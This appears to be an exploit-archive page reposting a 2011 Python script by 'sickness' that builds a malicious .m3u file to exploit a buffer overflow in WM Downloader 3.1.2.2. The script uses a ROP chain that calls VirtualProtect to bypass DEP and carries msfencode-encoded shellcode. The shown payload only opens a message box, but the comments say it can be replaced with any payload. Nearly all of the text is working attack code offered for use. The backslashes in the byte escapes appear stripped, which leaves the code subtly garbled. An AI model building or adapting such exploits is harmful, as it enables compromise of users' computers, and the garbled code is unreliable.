Home / os / win7

WM Downloader 3.1.2.2 2010.04.15 Buffer Overflow / DEP Bypas

Posted on 29 January 2011

#!/usr/bin/env python
# WM Downloader 3.1.2.2 2010.04.15 (.m3u) Buffer Overflow + DEP Bypass
# Author: sickness
# Download : http://mini-stream.net/wm-downloader/
# Tested : Windows XP Professional SP3 (EN) latest updates with IE8 and IE7
# DATE   : 29/01/2011
###################################################################
# You might need to change the offset.
# The payload can be replaced with whatever you want, there is enough space.
###################################################################

import sys

header='#EXTM3U
'
junk ='http://'+'x90' * 17400
junk+='x41'*17
eip  ='x1Ex17x80x7C'    # RETN
junk2='x41x41x41x41'


rop ='x77x92xD7x5A' # PUSH ESP # MOV EAX,EDX # POP EDI # RETN
rop+='x42xE8xC1x77' # PUSH EDI # POP EAX # POP EBP # RETN
rop+='x41x41x41x41' # POP EBP
rop+='xBBxA5x72x74' # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4
rop+='x41x41x41x41' # POP EBP
rop+='x94x28xC2x77' # ADD ESP,20 # POP EBP # RETN
rop+='x41x41x41x41' # RETN 4
rop+='x41x41x41x41' # POP EBP

vp ='xD4x1Ax80x7C'  # VirtualProtect()
vp+='WWWW'      # SC
vp+='XXXX'      # SC
vp+='YYYY'      # Size
vp+='ZZZZ'      # Policy
vp+='xD0x23x10x5D'  # Writable Memory
vp+='x41x41x41x41'  # Compensate ADD ESP,20
vp+='x41x41x41x41'  # Compensate ADD ESP,20

rop2 ='x2BxECxC4x77'        # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='xF5xD7xC1x77'    # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='xF5xD7xC1x77'    # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='xF5xD7xC1x77'    # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='x1FxC1xDDx73'    # MOV DWORD PTR DS:[ESI+20],EAX # POP ESI # RETN
rop2+='x41x41x41x41'    # POP ESI
rop2+='x42xE8xC1x77'    # PUSH EDI # POP EAX # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='xBBxA5x72x74'    # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4
rop2+='x41x41x41x41'    # POP EBP
rop2+='x2BxECxC4x77'    # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP RETN 4
rop2+='x41x41x41x41'    # POP EBP
rop2+='xF5xD7xC1x77'    # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='xF5xD7xC1x77'    # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='xF5xD7xC1x77'    # ADD EAX,20 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP'
rop2+='xCFx43xDDx73'    # MOV DWORD PTR DS:[ESI+24],EAX # POP ESI # RETN
rop2+='x41x41x41x41'    # POP ESI
rop2+='x42xE8xC1x77'    # PUSH EDI # POP EAX # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='xBBxA5x72x74'    # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4
rop2+='x41x41x41x41'    # POP EBP
rop2+='xC3xA9xE5x73'    # XOR EAX,EAX # POP EBP # RETN
rop2+='x41x41x41x41'    # RETN 4
rop2+='x41x41x41x41'    # POP EBP
rop2+='x2BxECxC4x77'    # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='x2BxECxC4x77'    # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='x2BxECxC4x77'    # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='x2BxECxC4x77'    # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='x2BxECxC4x77'    # ADD EAX,100 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='x46x21xE1x73'    # MOV DWORD PTR DS:[ESI+28],EAX # POP ESI # RETN
rop2+='x41x41x41x41'    # POP ESI
rop2+='x42xE8xC1x77'    # PUSH EDI # POP EAX # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='xBBxA5x72x74'    # INC ESI # PUSH EAX # POP ESI # POP EBP # RETN 4
rop2+='x41x41x41x41'    # POP EBP
rop2+='xC3xA9xE5x73'    # XOR EAX,EAX # POP EBP # RETN
rop2+='x41x41x41x41'    # RETN 4
rop2+='x41x41x41x41'    # POP EBP
rop2+='x1DxECxC4x77'    # ADD EAX,40 # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='x1Dx7Dx15x77'    # INC ESI # RETN
rop2+='x1Dx7Dx15x77'    # INC ESI # RETN
rop2+='x1Dx7Dx15x77'    # INC ESI # RETN
rop2+='x1Dx7Dx15x77'    # INC ESI # RETN
rop2+='x46x21xE1x73'    # MOV DWORD PTR DS:[ESI+28],EAX # POP ESI # RETN
rop2+='x41x41x41x41'    # POP ESI
rop2+='x42xE8xC1x77'    # PUSH EDI # POP EAX # POP EBP # RETN
rop2+='x41x41x41x41'    # POP EBP
rop2+='x1Dx2DxE2x73'    # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73'    # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73'    # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73'    # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73'    # ADD EAX,4 # RETN
rop2+='x1Dx2DxE2x73'    # ADD EAX,4 # RETN
rop2+='xB1x9Cx5Cx75'    # PUSH EAX # POP EBP # RETN 4
rop2+='x26x25xAAx71'    # MOV ESP,EBP # POP EBP # RETN
rop2+='x41x41x41x41'    # RETN 4
rop2+='x41x41x41x41'    # POP EBP


# msfpayload windows/messagebox TITLE=OWNED TEXT="Feel the pwnsauce." R | msfencode -a x86 -b 'x00x0ax0dx20x25x09' -t c
sc = ("xd9xe5xd9x74x24xf4x5dxb8xe9xf2x97x0fx29xc9xb1"
"x43x31x45x18x03x45x18x83xedx15x10x62xd6x0ex4e"
"x54x9dxf4x85x56x8cx46x12xa8xf9xc2x56xbbxc9x81"
"x1fx30xa1xe3xc3xc3xf3x03x77xadxdbx98xb1x6ax53"
"x86xc8x79x32xb7xe3x81x24xd7x88x12x83x33x04xaf"
"xf7xb0x4ex18x70xc7x84xd3xcaxdfxd3xbexeaxdex08"
"xddxdfxa9x45x16xabx28xb4x66x54x1bx88x75x06xdf"
"xc8xf2x50x1ex07xf7x5fx67x73xfcx5bx1bxa0xd5xee"
"x02x23x7fx35xc5xdfxe6xbexc9x54x6cx9axcdx6bx99"
"x90xe9xe0x5cx4fx78xb2x7ax93x1bxf8x31xa3xf2x2a"
"xbcx51x8dx11xd7x17xc3x9bxc4x7ax33x3cxebx84x3c"
"xcax51x7fx79xb3x81x9dx0excbx2ex46xa2x3bxc0x79"
"xbdx43x54xc0x49xd4x0bxa7x69x65xbcx04x5bx4bx58"
"x03xeexe0xc5xa1x98x5bx22x4cx11x85x7cxafx74x4e"
"x08x8dx26xf5xa2xb0x8bxb5x34xa8x37x94xd2xb0xc8"
"xe7xdcx5bx72x40x03xbcx12x3fx14xf2xa7x8ex41x82"
"x7bxd5x70x1ax60x7dx1ex32x3ex5ex88x39xdfxebx2b"
"xd6x3fx64xdbx48x57xa4x57xfdxc2xccxd1x98x69x61"
"xefxabxf9x35x2bx3ex70x24x02xecxd0xf4x34x42x2b"
"x2ax87xa2x83x34xbdx2a")

nops = 'x90' * 150
rest = 'x90' * 3600

exploit =header+junk+eip+junk2+rop+vp+rop2+nops+sc+rest

file = open('evil.m3u','w')
file.write(exploit)
file.close()
print 'Writing file, please wait ...
'
print 'Done!'

 

TOP